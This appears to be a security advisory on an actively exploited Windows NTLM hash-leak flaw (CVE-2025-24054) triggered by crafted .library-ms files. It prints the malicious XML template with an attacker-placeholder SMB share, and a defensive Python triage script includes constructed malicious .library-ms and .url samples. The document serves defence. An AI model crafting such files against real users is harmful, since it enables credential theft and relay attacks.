
Microsoft NTLM hash disclosure vulnerability now actively exploited

Take action: If you needed a reason to update Windows, how about having your NTLM credentials leaked by simply right-clicking or dragging and dropping a file? Don't delay; patching is not that hard.



Check Point Research is reporting active exploitation of a Windows spoofing vulnerability that lets attackers leak NTLM hashes through maliciously crafted .library-ms files.

The vulnerability is tracked as CVE-2025-24054 (CVSS score 6.5) and enables unauthorized disclosure of NTLM (New Technology LAN Manager) hashes with minimal user interaction. When exploited, Windows Explorer initiates an SMB connection to a remote server controlled by the attacker and authenticates to it, leaking the user's NTLM response. Explorer parses the file whenever it has to render it, so the leak can be triggered by simple actions such as extracting a ZIP archive containing the malicious file, navigating to a folder containing it, right-clicking on it, or dragging and dropping it.

Exploitation of this vulnerability can lead to theft of user credentials: the captured NTLMv2 response can be relayed to other services that accept NTLM authentication (NTLM relay) or cracked offline to recover the user's password.

Check Point Research has reported multiple campaigns leveraging this vulnerability. A notable campaign occurred around March 20-21, 2025, targeting government and private institutions in Poland and Romania. The attackers used phishing emails containing Dropbox links to malicious archives.

The malicious archives contained multiple files designed to leak NTLM hashes:

  • xd.library-ms - Exploiting CVE-2025-24054
  • xd.url - Exploiting CVE-2024-43451 (a similar, previously patched NTLM disclosure vulnerability in .url shortcut handling)
  • xd.website - A file that can trigger SMB connections
  • xd.lnk - A shortcut pointing to a malicious network resource

Later campaigns, discovered on March 25, 2025, distributed unarchived .library-ms files directly as email attachments. In these cases merely downloading the file was sufficient to trigger the exploit, because Explorer parses it as soon as it renders the folder the file was saved to.

A .library-ms file is an XML library description. The malicious ones carry a search connector whose location points at an attacker-controlled SMB server:

<?xml version="1.0" encoding="UTF-8"?> 
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\ATTACKER_IP\SHARE_NAME</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

When triggered, Windows attempts to connect to the specified SMB server and authenticates, sending the user's NTLMv2-SSP response (often called the Net-NTLMv2 hash) in the process.
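The following triage script is an added example for this page; it is not Check Point's or Microsoft's code. It parses the two text-based file types seen in the campaigns above, the .library-ms XML (namespace-aware, reading every <url> element) and the .url INI file (reading the URL=, IconFile= and WorkingDirectory= values Explorer resolves), and flags any location that would make Windows authenticate to a remote host: UNC paths in backslash or forward-slash form, the WebDAV \\host@SSL form, and file://host/ URLs. The sample files are constructed, the address 203.0.113.5 is a documentation placeholder for an attacker server, and the trusted_hosts allowlist is an assumption for environments with legitimate network libraries. The binary .lnk and the .website file are not handled.

```python
"""Triage .library-ms and .url files for locations that coerce SMB/WebDAV auth.

Constructed sample files are embedded below; 203.0.113.5 is a documentation
address standing in for an attacker-controlled server.
"""
import configparser
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"
# Host part of a UNC path in backslash or forward-slash form. Stops at the next
# separator or at the '@' of the WebDAV form (\\host@SSL@443\DavWWWRoot\...).
UNC_HOST = re.compile(r"^(?:\\\\|//)([^\\/@]+)")


def remote_host(location):
    """Return the host Windows would authenticate to for this location, else None."""
    loc = location.strip()
    m = UNC_HOST.match(loc)
    if m:
        return m.group(1)
    parsed = urlparse(loc)
    if parsed.scheme.lower() == "file" and parsed.hostname:
        return parsed.hostname  # file://host/share is resolved as a UNC path
    return None  # drive paths, knownfolder: references, http(s) URLs


def library_ms_targets(xml_text):
    """Every <url> value in a .library-ms description (namespace-aware).

    Malformed XML raises ET.ParseError; treat that as a triage failure, not as clean.
    """
    root = ET.fromstring(xml_text.lstrip("\ufeff \t\r\n"))  # tolerate a UTF-8 BOM
    return [(el.text or "").strip() for el in root.iter(f"{{{LIBRARY_NS}}}url")]


def url_file_targets(ini_text):
    """URL=, IconFile= and WorkingDirectory= values of a .url (InternetShortcut) file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    targets = []
    for section in cp.sections():
        for key in ("url", "iconfile", "workingdirectory"):  # configparser lower-cases keys
            if cp.has_option(section, key):
                targets.append(cp.get(section, key).strip())
    return targets


def triage(filename, content, trusted_hosts=frozenset()):
    """Return (filename, target, host) for each location that would send the
    user's NTLM response to a host outside trusted_hosts; [] means nothing remote."""
    name = filename.lower()
    if name.endswith(".library-ms"):
        targets = library_ms_targets(content)
    elif name.endswith(".url"):
        targets = url_file_targets(content)
    else:
        return []  # .lnk is binary and .website is not handled here
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for target in targets:
        host = remote_host(target)
        if host and host.lower() not in trusted:
            findings.append((filename, target, host))
    return findings


# Constructed samples: the page's payload shape with a placeholder server, a benign
# library pointing at a local folder, and a .url whose icon lives on a remote share.
MALICIOUS_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList><searchConnectorDescription>
<simpleLocation><url>\\203.0.113.5\share</url></simpleLocation>
</searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>
"""
BENIGN_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList><searchConnectorDescription>
<simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
</searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>
"""
MALICIOUS_URL = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=\\203.0.113.5\share\icon.ico
IconIndex=0
"""

if __name__ == "__main__":
    for name, data in (("xd.library-ms", MALICIOUS_LIBRARY),
                       ("docs.library-ms", BENIGN_LIBRARY),
                       ("xd.url", MALICIOUS_URL)):
        print(name, triage(name, data) or "clean")
```

Run it against a mail quarantine or a Downloads folder and review anything returned; a benign library that legitimately points at an internal file server can be suppressed by passing that server in trusted_hosts rather than by loosening the host check.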

This vulnerability affects all currently supported Windows client and server versions. Microsoft released the fix as part of the March 2025 security updates (Patch Tuesday, March 11, 2025).

Organizations are strongly advised to install the March 2025 security updates immediately, to block outbound SMB (TCP 445) at the network perimeter so that coerced authentication cannot reach internet-hosted servers, and to consider disabling NTLM authentication where it is not required (for example through the "Network security: Restrict NTLM" Group Policy settings). Note that the patch closes only the .library-ms trigger; the .url, .website and .lnk files seen in the same campaigns coerce SMB connections through other paths, so the network-level controls remain worthwhile.
